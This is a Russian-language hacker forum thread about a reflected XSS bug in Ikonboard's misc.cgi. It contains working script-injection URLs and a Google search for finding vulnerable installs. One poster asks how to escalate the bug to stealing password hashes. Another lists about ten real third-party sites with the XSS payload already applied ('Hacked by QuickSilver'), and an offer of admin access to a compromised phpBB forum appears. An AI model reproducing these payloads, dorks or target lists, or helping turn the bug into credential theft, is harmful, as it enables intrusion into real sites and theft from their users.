Что можно сделать с этим багом, или как сделать URL запрос, так чтобы были хеши паролей? :confused:
Эти exploit's реализуются на том сайте!!!Как мне их переделать?

Exploit'ы:
http://target/cgi-bin/ikonboard/misc.cgi?action=aim&aimname=<script>javascript:alert('hello')</script>
http://target/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=<script>javascript:alert('hello')</script>

Дай мне линк Я хочу взломать. Трудно найти сайты с уязвимыми старыми багами. Дай короче мне ссылку.

Дай мне линк Я хочу взломать. Трудно найти сайты с уязвимыми старыми багами. Дай короче мне ссылку.

А еще че те дать?
Болт на 18 :D не пляшет?

Ты ищи лучше вот ссылочка-->http://www.google.com/search?q=Powered+by+Ikonboard+2.1.9&sourceid=opera&num=0&ie=utf-8&oe=utf-8
;)

Давай линк быстрее. Хорошо взламывать не буду но багу посмотрю договорились? Ссылку давай.

Давай линк быстрее. Хорошо взламывать не буду но багу посмотрю договорились? Ссылку давай.

Объясни как и я тебе дам админа на phpBB 2.0.6 с 2700 аккаунтами etc... :rolleyes:

Гы гы гы......на таких форумах Я и сам могу получить Админа. Вот просто трудно сейчас на нете найти вещи со старыми багами. Я просто по экспорементировать хочу вот и всё. У меня есть идеи которые Я хочу проверить. Давай ссылку не жадничай.

Я на первой странице гугла кучу нашел :p (см. ниже). Я тока на версию внимания не обращал и запросик в гугле другой сделал, оттуда такая результативность:D

http://www.xtcidearecords.co.uk..... (http://www.xtcidearecords.co.uk/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.animestreet.de.... (http://www.animestreet.de/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://gramota.org.ru..... (http://gramota.org.ru/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.medialabs.com.sg..... (http://www.medialabs.com.sg/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.speechdelay.com..... (http://www.speechdelay.com/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.nekobox.org..... (http://www.nekobox.org/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.skat.com..... (http://www.skat.com/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.xfilesuk.com..... (http://www.xfilesuk.com/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.ebookfriends.com..... (http://www.ebookfriends.com/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)

http://www.toudy.com...... (http://www.toudy.com/cgi-bin/ikonboard/misc.cgi?action=icq&UIN=%3Cscript%3Ejavascript:alert(%27Hacked%20by%20 QuickSilver%27)%3C/script%3E)